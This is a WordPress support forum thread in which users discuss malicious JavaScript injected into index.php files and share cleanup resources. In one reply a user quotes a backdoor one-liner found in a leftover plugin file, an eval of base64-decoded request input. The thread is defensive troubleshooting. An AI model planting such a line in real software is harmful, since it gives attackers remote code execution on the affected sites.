Title: Javascript code apprearing on index.php – Malware Issue? Last modified: August 20, 2016 --- # Javascript code apprearing on index.php – Malware Issue? * [Mike Rodriguez](https://wordpress.org/support/users/iammikerodriguez/) * (@iammikerodriguez) * [14 years, 3 months ago](https://wordpress.org/support/topic/javascript-code-apprearing-on-indexphp-malware-issue-1/) * Hello all, this morning I woke up too a code appearing on my index.php file. The code is below: * _[Code moderated.]_ * I went on sucuri.net and used their free scanner to scan my site and i found this (screenshot): [http://i42.tinypic.com/34or0wk.png](http://i42.tinypic.com/34or0wk.png) * what can this possibly be, I changed all my passwords and checked all my .htaccess file and they were all clean. * Any input would be appreciated. Thanks in Advanced. Viewing 3 replies - 1 through 3 (of 3 total) * [tburdeinei](https://wordpress.org/support/users/tburdeinei/) * (@tburdeinei) * [14 years, 3 months ago](https://wordpress.org/support/topic/javascript-code-apprearing-on-indexphp-malware-issue-1/#post-2583775) * This is what I did to fix it- Rollback index.php to original and change its server permissions to read-only 555. * [MickeyRoush](https://wordpress.org/support/users/mickeyroush/) * (@mickeyroush) * [14 years, 3 months ago](https://wordpress.org/support/topic/javascript-code-apprearing-on-indexphp-malware-issue-1/#post-2583823) * There may be no easy solution. I’ve combined as many links into one post so that you won’t have to search the entire web indefinitely. Hopefully they will help you. * Check your site(s) here: 1. [http://sitecheck.sucuri.net/scanner/](http://sitecheck.sucuri.net/scanner/) 2. [http://www.unmaskparasites.com/](http://www.unmaskparasites.com/) 3. [http://www.virustotal.com/](http://www.virustotal.com/) 4. [http://www.phishtank.com/](http://www.phishtank.com/) 5. [http://www.browserdefender.com/](http://www.browserdefender.com/) 6. [http://ismyblogworking.com/](http://ismyblogworking.com/) 7. Google Safe Browsing (to access a site’s google info, add their domain to the end of this): [http://www.google.com/safebrowsing/diagnostic?site=](http://www.google.com/safebrowsing/diagnostic?site=) example: [http://www.google.com/safebrowsing/diagnostic?site=example.com](http://www.google.com/safebrowsing/diagnostic?site=example.com) * Backup everything and put that backup somewhere safe.This is in case you have problems later on. Even though you could be backing up infected files, it is more important to have a backup up of your work, for if you make a mistake cleaning your site, you will still have the backup(s). 1. [http://codex.wordpress.org/WordPress_Backups](http://codex.wordpress.org/WordPress_Backups) 2. [http://codex.wordpress.org/Backing_Up_Your_Database](http://codex.wordpress.org/Backing_Up_Your_Database) 3. [http://codex.wordpress.org/Restoring_Your_Database_From_Backup](http://codex.wordpress.org/Restoring_Your_Database_From_Backup) * Then read these: 1. [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked) 2. [http://wordpress.org/support/topic/268083#post-1065779](http://wordpress.org/support/topic/268083#post-1065779) 3. [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/) 4. [http://ottopress.com/2009/hacked-wordpress-backdoors/](http://ottopress.com/2009/hacked-wordpress-backdoors/) * If you have indications of possible timthumb hacking, please read these: 1. [http://blog.sucuri.net/2011/08/timthumb-php-security-vulnerability-just-the-tip-of-the-iceberg.html](http://blog.sucuri.net/2011/08/timthumb-php-security-vulnerability-just-the-tip-of-the-iceberg.html) 2. [http://markmaunder.com/2011/08/02/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/](http://markmaunder.com/2011/08/02/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/) 3. [http://www.wpbeginner.com/wp-tutorials/how-to-fix-and-cleanup-the-timthumb-hack-in-wordpress/](http://www.wpbeginner.com/wp-tutorials/how-to-fix-and-cleanup-the-timthumb-hack-in-wordpress/) 4. [http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/](http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/) * Once your site is clean, then read this: 1. [http://codex.wordpress.org/Hardening_WordPress](http://codex.wordpress.org/Hardening_WordPress) 2. [http://codex.wordpress.org/htaccess_for_subdirectories](http://codex.wordpress.org/htaccess_for_subdirectories) * [gal_op](https://wordpress.org/support/users/gal_op/) * (@gal_op) * [14 years, 3 months ago](https://wordpress.org/support/topic/javascript-code-apprearing-on-indexphp-malware-issue-1/#post-2583886) * I have the same issue, all my index.php are keep on being injected with the malicious code. * I found an old plugin folder that i have uninstalled in the past, the folder is empty except to a file called ToolPack.php and it had a line of code: $_REQUEST[ e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit; * I have removed the folder and now i am waiting to see if the malicious code is back. * I have found out that this is could be the backdoor: [http://blog.sucuri.net/2012/02/new-wordpress-toolspack-plugin.html](http://blog.sucuri.net/2012/02/new-wordpress-toolspack-plugin.html) * Will update you soon Viewing 3 replies - 1 through 3 (of 3 total) The topic ‘Javascript code apprearing on index.php – Malware Issue?’ is closed to new replies. * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/) * 3 replies * 4 participants * Last reply from: [gal_op](https://wordpress.org/support/users/gal_op/) * Last activity: [14 years, 3 months ago](https://wordpress.org/support/topic/javascript-code-apprearing-on-indexphp-malware-issue-1/#post-2583886) * Status: not resolved ## Topics ### Topics with no replies ### Non-support topics ### Resolved topics ### Unresolved topics ### All topics